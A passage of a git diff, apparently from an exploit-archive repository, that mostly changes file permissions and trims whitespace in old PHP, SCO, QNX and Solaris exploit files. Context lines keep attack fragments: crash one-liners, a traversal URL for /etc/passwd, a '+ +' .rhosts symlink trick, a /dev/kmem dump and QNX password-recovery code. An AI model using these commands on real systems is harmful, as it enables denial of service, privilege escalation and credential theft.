YogyaCarderLink.v3n0m -############################################################# - \ No newline at end of file +############################################################# \ No newline at end of file diff --git a/platforms/php/webapps/9840.txt b/platforms/php/webapps/9840.txt old mode 100755 new mode 100644 index 508cc1beb..418c314ae --- a/platforms/php/webapps/9840.txt +++ b/platforms/php/webapps/9840.txt @@ -18,5 +18,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m -############################################################# - \ No newline at end of file +############################################################# \ No newline at end of file diff --git a/platforms/php/webapps/9847.txt b/platforms/php/webapps/9847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9849.php b/platforms/php/webapps/9849.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9850.txt b/platforms/php/webapps/9850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9854.txt b/platforms/php/webapps/9854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9855.txt b/platforms/php/webapps/9855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9863.txt b/platforms/php/webapps/9863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9867.txt b/platforms/php/webapps/9867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9875.txt b/platforms/php/webapps/9875.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9876.txt b/platforms/php/webapps/9876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9880.txt b/platforms/php/webapps/9880.txt old mode 100755 new mode 100644 index 1681c43fc..a8493d0a8 --- a/platforms/php/webapps/9880.txt +++ b/platforms/php/webapps/9880.txt @@ -19,14 +19,4 @@ # [*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x ! [*] Made in Brazil -[*] Reference: http://securityreason.com/exploitalert/7435 - - - - - - - - - - \ No newline at end of file +[*] Reference: http://securityreason.com/exploitalert/7435 \ No newline at end of file diff --git a/platforms/php/webapps/9888.txt b/platforms/php/webapps/9888.txt old mode 100755 new mode 100644 index 57e142fd5..e36329a44 --- a/platforms/php/webapps/9888.txt +++ b/platforms/php/webapps/9888.txt @@ -58,4 +58,4 @@ Joke.. ;) [+] makasih buad babe and enyak .... muach .. [+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha -[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^ \ No newline at end of file +[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^ \ No newline at end of file diff --git a/platforms/php/webapps/9889.txt b/platforms/php/webapps/9889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9890.txt b/platforms/php/webapps/9890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9891.txt b/platforms/php/webapps/9891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9892.txt b/platforms/php/webapps/9892.txt old mode 100755 new mode 100644 index 8ff552d20..b8d584020 --- a/platforms/php/webapps/9892.txt +++ b/platforms/php/webapps/9892.txt @@ -47,4 +47,4 @@ http://www.wideskygroup.com/index.php?option=com_photoblog&view=blogs&category=- [ QUOTE ] [+] M3NW5 kemana aje lo ?? kangen nih .. hha -[+] AURAKASIH dont leave me ... \ No newline at end of file +[+] AURAKASIH dont leave me ... \ No newline at end of file diff --git a/platforms/php/webapps/9897.txt b/platforms/php/webapps/9897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9903.txt b/platforms/php/webapps/9903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9922.txt b/platforms/php/webapps/9922.txt old mode 100755 new mode 100644 index 11f54770e..f587348ef --- a/platforms/php/webapps/9922.txt +++ b/platforms/php/webapps/9922.txt @@ -40,8 +40,4 @@ # - sp3x # -[0]Reference: http://securityreason.com/exploitalert/7422 - - - - \ No newline at end of file +[0]Reference: http://securityreason.com/exploitalert/7422 \ No newline at end of file diff --git a/platforms/php/webapps/9933.txt b/platforms/php/webapps/9933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9961.txt b/platforms/php/webapps/9961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9962.txt b/platforms/php/webapps/9962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9964.txt b/platforms/php/webapps/9964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9965.txt b/platforms/php/webapps/9965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9978.txt b/platforms/php/webapps/9978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9979.txt b/platforms/php/webapps/9979.txt old mode 100755 new mode 100644 diff --git a/platforms/plan9/local/3383.c b/platforms/plan9/local/3383.c old mode 100755 new mode 100644 diff --git a/platforms/python/webapps/38411.txt b/platforms/python/webapps/38411.txt old mode 100755 new mode 100644 diff --git a/platforms/python/webapps/38738.txt b/platforms/python/webapps/38738.txt old mode 100755 new mode 100644 index ffd6f5bf3..93f9f2c60 --- a/platforms/python/webapps/38738.txt +++ b/platforms/python/webapps/38738.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to hijack user sessions and gain unauthorized Note: This issue was previously discussed in the BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it. -https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch \ No newline at end of file +https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch \ No newline at end of file diff --git a/platforms/python/webapps/39199.html b/platforms/python/webapps/39199.html old mode 100755 new mode 100644 diff --git a/platforms/python/webapps/39821.txt b/platforms/python/webapps/39821.txt old mode 100755 new mode 100644 diff --git a/platforms/python/webapps/40129.txt b/platforms/python/webapps/40129.txt old mode 100755 new mode 100644 diff --git a/platforms/python/webapps/40799.txt b/platforms/python/webapps/40799.txt old mode 100755 new mode 100644 diff --git a/platforms/python/webapps/43021.py b/platforms/python/webapps/43021.py index 496411032..961cdfad5 100755 --- a/platforms/python/webapps/43021.py +++ b/platforms/python/webapps/43021.py @@ -206,6 +206,4 @@ Update to 1.2.8p26. 10. REFERENCES ============= [0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/ -[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 - - +[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 \ No newline at end of file diff --git a/platforms/qnx/dos/7823.txt b/platforms/qnx/dos/7823.txt old mode 100755 new mode 100644 diff --git a/platforms/qnx/local/1347.c b/platforms/qnx/local/1347.c old mode 100755 new mode 100644 diff --git a/platforms/qnx/local/19851.c b/platforms/qnx/local/19851.c old mode 100755 new mode 100644 index f5f0025d3..b2e7b5e0a --- a/platforms/qnx/local/19851.c +++ b/platforms/qnx/local/19851.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/1114/info A design error in the operation of the crypt(3) function exists in QNX, from QNX System Software, Limited (QSSL). The flaw allows the recovery of passwords from the hashes. On most Unix variants, crypt(3) is based on a variant of the DES encryption algorithm, used as a hashing algorithm. QNX, however, implements its own hashing algorithm, which, unlike standard crypt(3), contains all the information required to directly recover the password. This can result in the recovery of passwords by local users who have access to the password file, which in turn can result in the compromise of the root account. +*/ static ascii2bin(short x) { @@ -30,8 +32,7 @@ char *quncrypt(char *pw) for (i=0;i<12;i++) newpw[i]=ascii2bin(pw[i]); newpw[13]=0; - rot=(salt[1]*4-salt[0])%128; /* here's all the salt -does. A rotation */ + rot=(salt[1]*4-salt[0])%128; /* here's all the saltdoes. A rotation */ for (i=0;i<12;i++) { for (j=0;j<6;j++) @@ -58,4 +59,4 @@ does. A rotation */ } newpw[8]=0; return newpw; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/qnx/local/27168.txt b/platforms/qnx/local/27168.txt old mode 100755 new mode 100644 diff --git a/platforms/qnx/local/32154.c b/platforms/qnx/local/32154.c old mode 100755 new mode 100644 diff --git a/platforms/qnx/local/32155.c b/platforms/qnx/local/32155.c old mode 100755 new mode 100644 diff --git a/platforms/qnx/local/32156.txt b/platforms/qnx/local/32156.txt old mode 100755 new mode 100644 diff --git a/platforms/ruby/webapps/39730.txt b/platforms/ruby/webapps/39730.txt old mode 100755 new mode 100644 diff --git a/platforms/ruby/webapps/39997.txt b/platforms/ruby/webapps/39997.txt old mode 100755 new mode 100644 diff --git a/platforms/ruby/webapps/40236.txt b/platforms/ruby/webapps/40236.txt old mode 100755 new mode 100644 diff --git a/platforms/ruby/webapps/42961.txt b/platforms/ruby/webapps/42961.txt old mode 100755 new mode 100644 index 3200c717a..55028e878 --- a/platforms/ruby/webapps/42961.txt +++ b/platforms/ruby/webapps/42961.txt @@ -25,4 +25,4 @@ It's less damaging than a traditional "hack back" but is sure to irritate the lo 3. Rapid7 Security Bulletin -https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/ +https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/ \ No newline at end of file diff --git a/platforms/sco/dos/20532.txt b/platforms/sco/dos/20532.txt old mode 100755 new mode 100644 index 8bd7d5d98..6d40ac5bd --- a/platforms/sco/dos/20532.txt +++ b/platforms/sco/dos/20532.txt @@ -6,4 +6,4 @@ It is possible to cause a denial of service in NetScreen Firewall. Requesting an Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall= will crash: -$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80 \ No newline at end of file +$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80 \ No newline at end of file diff --git a/platforms/sco/dos/20735.txt b/platforms/sco/dos/20735.txt old mode 100755 new mode 100644 index 54a4e075c..1498b1aa4 --- a/platforms/sco/dos/20735.txt +++ b/platforms/sco/dos/20735.txt @@ -10,4 +10,4 @@ If properly exploited, this can yield user 'bin' privileges to the attacker. /opt/K/SCO/Unix/5.0.6Ga/usr/lib/lpadmin `perl -e 'print "A" x 7000'` -Memory fault - core dumped \ No newline at end of file +Memory fault - core dumped \ No newline at end of file diff --git a/platforms/sco/dos/20736.txt b/platforms/sco/dos/20736.txt old mode 100755 new mode 100644 index 226d43958..3e52f99ab --- a/platforms/sco/dos/20736.txt +++ b/platforms/sco/dos/20736.txt @@ -10,4 +10,4 @@ An attacker may exploit this vulnerability execute arbitrary code with effective /opt/K/SCO/Unix/5.0.6Ga/usr/lib/lpforms `perl -e 'print "A" x 7000'` -Memory fault - core dumped \ No newline at end of file +Memory fault - core dumped \ No newline at end of file diff --git a/platforms/sco/dos/20737.txt b/platforms/sco/dos/20737.txt old mode 100755 new mode 100644 index d9ec29504..afcbab1f8 --- a/platforms/sco/dos/20737.txt +++ b/platforms/sco/dos/20737.txt @@ -9,4 +9,4 @@ An attacker may exploit this vulnerability to execute arbitrary code with effect /opt/K/SCO/Unix/5.0.6Ga/usr/lib/lpshut `perl -e 'print "A" x 7000'` -Memory fault - core dumped \ No newline at end of file +Memory fault - core dumped \ No newline at end of file diff --git a/platforms/sco/dos/20739.txt b/platforms/sco/dos/20739.txt old mode 100755 new mode 100644 index 4d2f81798..116b1895c --- a/platforms/sco/dos/20739.txt +++ b/platforms/sco/dos/20739.txt @@ -9,4 +9,4 @@ If properly exploited, this can yield root privilege to the attacker. /opt/K/SCO/Unix/5.0.6Ga/usr/lib/lpusers -u `perl -e 'print "A" x 700'` -Memory fault - core dumped \ No newline at end of file +Memory fault - core dumped \ No newline at end of file diff --git a/platforms/sco/dos/20742.txt b/platforms/sco/dos/20742.txt old mode 100755 new mode 100644 index 4441b3a61..806cd3b0b --- a/platforms/sco/dos/20742.txt +++ b/platforms/sco/dos/20742.txt @@ -10,4 +10,4 @@ If properly exploited, this can yield user 'bin' privileges to the attacker. /opt/K/SCO/Unix/5.0.6Ga/usr/bin/recon `perl -e 'print "A" x 3000'` -Memory fault - core dumped \ No newline at end of file +Memory fault - core dumped \ No newline at end of file diff --git a/platforms/sco/local/1402.c b/platforms/sco/local/1402.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/1534.c b/platforms/sco/local/1534.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19362.c b/platforms/sco/local/19362.c old mode 100755 new mode 100644 index b3f71faa5..8d0b89821 --- a/platforms/sco/local/19362.c +++ b/platforms/sco/local/19362.c @@ -84,4 +84,4 @@ for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/sco/local/19542.txt b/platforms/sco/local/19542.txt old mode 100755 new mode 100644 index 0cc344a7d..5ec249933 --- a/platforms/sco/local/19542.txt +++ b/platforms/sco/local/19542.txt @@ -27,4 +27,4 @@ scohack:/# cat /etc/shadow.old SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) -scohack:/# \ No newline at end of file +scohack:/# \ No newline at end of file diff --git a/platforms/sco/local/19543.c b/platforms/sco/local/19543.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19641.c b/platforms/sco/local/19641.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19642.c b/platforms/sco/local/19642.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19643.c b/platforms/sco/local/19643.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19656.c b/platforms/sco/local/19656.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19657.txt b/platforms/sco/local/19657.txt old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19658.txt b/platforms/sco/local/19658.txt old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19660.c b/platforms/sco/local/19660.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19661.c b/platforms/sco/local/19661.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19674.c b/platforms/sco/local/19674.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/19752.txt b/platforms/sco/local/19752.txt old mode 100755 new mode 100644 diff --git a/platforms/sco/local/20230.c b/platforms/sco/local/20230.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/20851.txt b/platforms/sco/local/20851.txt old mode 100755 new mode 100644 index 622cb5fbc..d08582c71 --- a/platforms/sco/local/20851.txt +++ b/platforms/sco/local/20851.txt @@ -14,4 +14,4 @@ $ id uid=232(kevin) gid=101(supp) groups=101(supp),50(group) $ ./tellxdt3 /usr/bin/id *** Can't open message catalogue XDesktop3 -uid=0(root) gid=3(sys) groups=3(sys),1(other) \ No newline at end of file +uid=0(root) gid=3(sys) groups=3(sys),1(other) \ No newline at end of file diff --git a/platforms/sco/local/21489.txt b/platforms/sco/local/21489.txt old mode 100755 new mode 100644 diff --git a/platforms/sco/local/2332.c b/platforms/sco/local/2332.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/24293.c b/platforms/sco/local/24293.c old mode 100755 new mode 100644 index 9aba2d51a..ca608d0d3 --- a/platforms/sco/local/24293.c +++ b/platforms/sco/local/24293.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/10758/info It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input. @@ -5,6 +6,7 @@ It has been reported that the SCO Multi-channel Memorandum Distribution Facility These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed. An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users. +*/ /* * MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86 diff --git a/platforms/sco/local/261.c b/platforms/sco/local/261.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/5356.c b/platforms/sco/local/5356.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/5357.c b/platforms/sco/local/5357.c old mode 100755 new mode 100644 diff --git a/platforms/sco/local/602.c b/platforms/sco/local/602.c old mode 100755 new mode 100644 diff --git a/platforms/sco/remote/19680.c b/platforms/sco/remote/19680.c old mode 100755 new mode 100644 diff --git a/platforms/sco/remote/20568.txt b/platforms/sco/remote/20568.txt old mode 100755 new mode 100644 index e3223d5f7..59045bd57 --- a/platforms/sco/remote/20568.txt +++ b/platforms/sco/remote/20568.txt @@ -4,4 +4,4 @@ view-source is a script included with the httpd package bundled with Skunkware 2 A problem with the view-source script could allow access to restricted files remotely. The problem occurs in the handling of slashes and dots when appended to the view-source script. By appending a series of double-dots and slashes to a query using the view-source script, it is possible to traverse the directory structure on a web server. By doing so, it is possible for to view the contents of directories, and files that are readable by the UID of the httpd process. This flaw makes it possible for a user with malicious motives to read files on a remote system and gather intelligence for an attack against the system, as well as other potentially sensitive information. -http://vulnerable.server/cgi-bin/view-source?../../../../../../../etc/passwd \ No newline at end of file +http://vulnerable.server/cgi-bin/view-source?../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/sco/remote/20620.c b/platforms/sco/remote/20620.c old mode 100755 new mode 100644 diff --git a/platforms/sco_x86/shellcode/13488.c b/platforms/sco_x86/shellcode/13488.c old mode 100755 new mode 100644 diff --git a/platforms/sh4/shellcode/17432.c b/platforms/sh4/shellcode/17432.c old mode 100755 new mode 100644 diff --git a/platforms/sh4/shellcode/17439.c b/platforms/sh4/shellcode/17439.c old mode 100755 new mode 100644 diff --git a/platforms/sh4/shellcode/18154.c b/platforms/sh4/shellcode/18154.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/11351.c b/platforms/solaris/dos/11351.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/19042.txt b/platforms/solaris/dos/19042.txt old mode 100755 new mode 100644 index efc4528a0..5d58b3496 --- a/platforms/solaris/dos/19042.txt +++ b/platforms/solaris/dos/19042.txt @@ -19,4 +19,4 @@ $ set PATH=/tmp:$PATH $ export PATH $ /usr/bin/makeinstall $ /tmp/sh -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/solaris/local/19326.txt b/platforms/solaris/dos/19326.txt old mode 100755 new mode 100644 similarity index 93% rename from platforms/solaris/local/19326.txt rename to platforms/solaris/dos/19326.txt index f65b2c41c..5e43533f9 --- a/platforms/solaris/local/19326.txt +++ b/platforms/solaris/dos/19326.txt @@ -8,4 +8,4 @@ This is due to a bug in the Solaris 7 procfs. %more /proc/self/psinfo -[crash] \ No newline at end of file +[crash] \ No newline at end of file diff --git a/platforms/solaris/dos/19507.txt b/platforms/solaris/dos/19507.txt old mode 100755 new mode 100644 index cf64337e2..d67752f78 --- a/platforms/solaris/dos/19507.txt +++ b/platforms/solaris/dos/19507.txt @@ -4,4 +4,4 @@ A vulnerability in Solaris TCP/IP stack may allow remote users to panic the syst If the nmap network mapping utility is used with the OS fingerprinting option ('-O') against an active listening port and the server listening on that port is then killed the system will panic because of recursive calls to mutex_enter within the TCP streams driver. -$nmap -O -p 80 targethost.com \ No newline at end of file +$nmap -O -p 80 targethost.com \ No newline at end of file diff --git a/platforms/solaris/dos/19635.c b/platforms/solaris/dos/19635.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/19681.txt b/platforms/solaris/dos/19681.txt old mode 100755 new mode 100644 index 99114ee5b..775325140 --- a/platforms/solaris/dos/19681.txt +++ b/platforms/solaris/dos/19681.txt @@ -7,4 +7,4 @@ Buffer Overflow Crash: echo `perl -e "print 'A' x 1000"` > /usr/home/btellier/my.mif dmi_cmd -CI ../../../usr/home/btellier/my.mif -(dmispd segfaults) \ No newline at end of file +(dmispd segfaults) \ No newline at end of file diff --git a/platforms/solaris/dos/28911.txt b/platforms/solaris/dos/28911.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/29406.c b/platforms/solaris/dos/29406.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/29540.c b/platforms/solaris/dos/29540.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/34027.txt b/platforms/solaris/dos/34027.txt old mode 100755 new mode 100644 index 76c2cd25b..8d55965ea --- a/platforms/solaris/dos/34027.txt +++ b/platforms/solaris/dos/34027.txt @@ -6,4 +6,4 @@ Exploiting this issue allows local users to cause denial-of-service conditions i Sun Solaris 10 is affected, other versions may also be vulnerable. -perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }' \ No newline at end of file +perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }' \ No newline at end of file diff --git a/platforms/solaris/dos/34028.txt b/platforms/solaris/dos/34028.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/34309.txt b/platforms/solaris/dos/34309.txt old mode 100755 new mode 100644 index 6c162802d..d25d4ad13 --- a/platforms/solaris/dos/34309.txt +++ b/platforms/solaris/dos/34309.txt @@ -9,4 +9,4 @@ The following products are affected: Solaris 10 OpenSolaris -/usr/bin/rdist -cDwh file_that_is_hardlink rlogin_host:LONG_STRING \ No newline at end of file +/usr/bin/rdist -cDwh file_that_is_hardlink rlogin_host:LONG_STRING \ No newline at end of file diff --git a/platforms/solaris/dos/4881.c b/platforms/solaris/dos/4881.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/5258.c b/platforms/solaris/dos/5258.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/6775.c b/platforms/solaris/dos/6775.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/7865.c b/platforms/solaris/dos/7865.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/8597.c b/platforms/solaris/dos/8597.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/8598.c b/platforms/solaris/dos/8598.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/dos/9823.c b/platforms/solaris/dos/9823.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/1073.c b/platforms/solaris/local/1073.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/1074.c b/platforms/solaris/local/1074.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/1092.c b/platforms/solaris/local/1092.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/114.c b/platforms/solaris/local/114.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/1182.c b/platforms/solaris/local/1182.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/1360.c b/platforms/solaris/local/1360.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/15245.txt b/platforms/solaris/local/15245.txt old mode 100755 new mode 100644 index d3d826474..b551afa86 --- a/platforms/solaris/local/15245.txt +++ b/platforms/solaris/local/15245.txt @@ -81,4 +81,4 @@ int main(int argc,char *argv[]){ } -// This was disclosed and patched in October 2010, CVE-2010-3503 \ No newline at end of file +// This was disclosed and patched in October 2010, CVE-2010-3503 \ No newline at end of file diff --git a/platforms/solaris/local/15962.c b/platforms/solaris/local/15962.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19126.txt b/platforms/solaris/local/19126.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19128.c b/platforms/solaris/local/19128.c old mode 100755 new mode 100644 index 9668e1f50..fdfc6fb0c --- a/platforms/solaris/local/19128.c +++ b/platforms/solaris/local/19128.c @@ -1,7 +1,8 @@ +/* source: http://www.securityfocus.com/bid/166/info Sdtcm_convert is a setuid-root data conversion utility which converts OpenWindows version 3 calendar data files to version 4 and vice versa. A buffer overflow condition has been found in sdtcm_convert which may be exploited to obtain root access. - +*/ /*============================================================================= sdtcm_convert Overflow Exploits( for Sparc Edition) diff --git a/platforms/solaris/local/19158.c b/platforms/solaris/local/19158.c old mode 100755 new mode 100644 index b189cb600..9777c2cd2 --- a/platforms/solaris/local/19158.c +++ b/platforms/solaris/local/19158.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/201/info There is a buffer overflow condition on arguments in Pluggable Authentication Modules (PAM) and unix_scheme (5.4 and 5.3). Therefore, an unauthorized user could exploit this vulnerability via the passwd program to gain root access. Under SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, yppasswd and nispasswd are hard links to the passwd program and therefore are also vulnerable. Under SunOS 5.4 and 5.3, passwd, yppasswd, and nispasswd are separate programs but they dynamically link unix_scheme and are affected. +*/ /* This is for Solaris 2.5.(1) ! diff --git a/platforms/solaris/local/19159.c b/platforms/solaris/local/19159.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19160.c b/platforms/solaris/local/19160.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19161.txt b/platforms/solaris/local/19161.txt old mode 100755 new mode 100644 index 011e46cf6..cb65101e2 --- a/platforms/solaris/local/19161.txt +++ b/platforms/solaris/local/19161.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/209/info The ping program is used to assess network connectivity between network devices. A denial of service condition exists in the ping program that may cause the system to panic by sending ping requests to a multicast address through the loopback interface. The system will ping itself; however, the incoming queue pointer is not yet initialized when the packet is received. Thus, the system will panic. -%ping -sv -i 127.0.0.1 224.0.0.1 \ No newline at end of file +%ping -sv -i 127.0.0.1 224.0.0.1 \ No newline at end of file diff --git a/platforms/solaris/local/19199.c b/platforms/solaris/local/19199.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19205.c b/platforms/solaris/local/19205.c old mode 100755 new mode 100644 index 3abdba1b6..d5e022acf --- a/platforms/solaris/local/19205.c +++ b/platforms/solaris/local/19205.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/249/info The dtprintinfo is a setuid commands open the CDE Print Manager window. A stack based buffer overflow in the handling of the "-p" option allow the execution of arbitrary code as root. @@ -13,6 +14,7 @@ echo "system for lpprn: server.com" % setenv PATH .:$PATH % gcc ex_dtprintinfo.c % a.out +*/ /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition) diff --git a/platforms/solaris/local/19206.c b/platforms/solaris/local/19206.c old mode 100755 new mode 100644 index 339ae8798..2fbc00507 --- a/platforms/solaris/local/19206.c +++ b/platforms/solaris/local/19206.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/251/info A stack buffer overflow vulnerability in the handling of the "-a" command in the lpset program allows arbitrary execution of code with root privileges. @@ -5,6 +6,7 @@ A stack buffer overflow vulnerability in the handling of the "-a" command in the The lpset utility sets printing configuration information in the system configuration databases. lpset can be used to create and update printing configuration in /etc/printers.conf or Federated Naming System (FNS). Only a superuser or a member of Group 14 may execute lpset. There has been mixed results as to whether the applications exits with the message "Permission denied: not in group 14." before the overflow can be exploited, and thus the vulnerability can only be exploited by members of group 14. +*/ /*=================================================================== ex_lpset.c Overflow Exploits( for Intel Edition ) diff --git a/platforms/solaris/local/19232.txt b/platforms/solaris/local/19232.txt old mode 100755 new mode 100644 index dfc4e0f40..23b270690 --- a/platforms/solaris/local/19232.txt +++ b/platforms/solaris/local/19232.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/291/info The version of arp(8c) which shipped with versions of SunOs 4.1.X could be used to dump system memory by using the -f flag. This flag causes the file filename to be read and multiple entries to be set in the ARP tables. However, in this instance because of poor permission sets on /dev/kmem a user can specify the file to be read as /dev/kmem and therefore gain a dump of currently paged system memory. This could lead to a root compromise. -$ arp -f /dev/kmem | strings > mem \ No newline at end of file +$ arp -f /dev/kmem | strings > mem \ No newline at end of file diff --git a/platforms/solaris/local/19233.txt b/platforms/solaris/local/19233.txt old mode 100755 new mode 100644 index aae4c3089..f7937a4ed --- a/platforms/solaris/local/19233.txt +++ b/platforms/solaris/local/19233.txt @@ -5,4 +5,4 @@ Aspppd is a tool shipped with Solaris for dial up PPP access. This tool creates $ echo "+ +" >> .rhosts $ ln -s /.rhosts /tmp/.asppp.fifo -Wait for asppd to be excecuted. \ No newline at end of file +Wait for asppd to be excecuted. \ No newline at end of file diff --git a/platforms/solaris/local/19234.c b/platforms/solaris/local/19234.c old mode 100755 new mode 100644 index 0640d4085..486b91f0c --- a/platforms/solaris/local/19234.c +++ b/platforms/solaris/local/19234.c @@ -114,4 +114,4 @@ execl("/usr/bin/cancel", "cancel", egg, NULL); printf("exec failed!\n"); return; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/19235.txt b/platforms/solaris/local/19235.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19258.sh b/platforms/solaris/local/19258.sh index 2da766f98..dbe49d107 100755 --- a/platforms/solaris/local/19258.sh +++ b/platforms/solaris/local/19258.sh @@ -127,4 +127,4 @@ rm -rf /tmp/.bk " | /tmp/bob echo "everything should be cool.. i think :>" -/tmp/bob \ No newline at end of file +/tmp/bob \ No newline at end of file diff --git a/platforms/solaris/local/19341.c b/platforms/solaris/local/19341.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19342.c b/platforms/solaris/local/19342.c old mode 100755 new mode 100644 index 32e627759..ed867a084 --- a/platforms/solaris/local/19342.c +++ b/platforms/solaris/local/19342.c @@ -1,6 +1,6 @@ +/* source: http://www.securityfocus.com/bid/452/info - There is an unchecked sprintf() call in the versions of /usr/openwin/bin/kcms_configure shipped with solaris 2.5, 2.5.1 and 2.6. Unfortunately, kcms_configure is installed setuid root, making it possible for an attacker to overflow the buffer and have arbitrary code executed with superuser privileges. The consequence of this vulnerability being exploited is a local root compromise. UNYUN@ShadowPenguinSecurity$B$G$9(B @@ -44,8 +44,10 @@ Sparc$B$N>l9g!"%*%U%;%C%H(B2092-2093,2112-2115$B$r(Bfake$B$9$k$3$H$K$h$j!"% 